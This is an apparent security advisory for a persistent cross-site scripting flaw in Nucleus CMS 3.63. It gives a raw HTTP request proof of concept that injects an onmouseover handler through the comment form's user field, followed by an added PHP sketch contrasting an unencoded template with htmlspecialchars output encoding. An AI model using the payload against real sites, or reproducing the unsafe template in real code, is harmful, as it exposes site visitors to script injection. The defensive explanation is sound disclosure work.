
Nucleus CMS 3.63 Persistent Cross-site Scripting

Description

Proof Of Concept

POST http://localhost/nucleus3.63/index.php?itemid=1 HTTP/1.1
Host: localhost
Connection: keep-alive
Referer: http://localhost/nucleus3.63/index.php?itemid=1
Content-Length: 119
Cache-Control: max-age=0
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

action=addcomment&url=index.php%3Fitemid%3D1&itemid=1&body=xxx&user="onmouseover="alert(0)"&userid=zzzz&email=x%40x.com
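
The shape of the `user` value above suggests it is written into a double-quoted HTML attribute without encoding; that is an assumption, since the advisory does not show the affected template. The following is an added example, not Nucleus code and not part of the original advisory: a hypothetical comment template (markup and function names are invented for illustration) rendered first unencoded and then with output encoding applied at render time.

```php
<?php
declare(strict_types=1);

// Constructed sample: the form body from the proof of concept above.
const POC_BODY = 'action=addcomment&url=index.php%3Fitemid%3D1&itemid=1&body=xxx'
    . '&user="onmouseover="alert(0)"&userid=zzzz&email=x%40x.com';

/** Encode a value for HTML text or a quoted attribute (both quote styles). */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Hypothetical template: the stored name is concatenated in raw. */
function render_comment_unsafe(array $comment): string
{
    return '<a class="author" title="' . $comment['user'] . '">'
        . $comment['user'] . '</a>';
}

/** Same hypothetical template with every dynamic value encoded on output. */
function render_comment_safe(array $comment): string
{
    return '<a class="author" title="' . attr($comment['user']) . '">'
        . attr($comment['user']) . '</a>';
}

/** Audit helper: does a stored value carry characters that end an attribute or tag? */
function needs_encoding(string $value): bool
{
    return strpbrk($value, "\"'<>&") !== false;
}

// parse_str() URL-decodes and splits each pair on the first "=" only,
// so the quotes and the second "=" stay inside the user value.
parse_str(POC_BODY, $comment);

echo 'stored user field : ', $comment['user'], PHP_EOL;
echo 'needs encoding    : ', needs_encoding($comment['user']) ? 'yes' : 'no', PHP_EOL;
echo 'unencoded render  : ', render_comment_unsafe($comment), PHP_EOL;
echo 'encoded render    : ', render_comment_safe($comment), PHP_EOL;
```

In the unencoded render the leading quote closes `title` and `onmouseover` becomes an attribute of its own; in the encoded render the quotes are emitted as `&quot;` and the whole value stays inside `title`.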


Copyright © 2018 AutoSec Tools LLC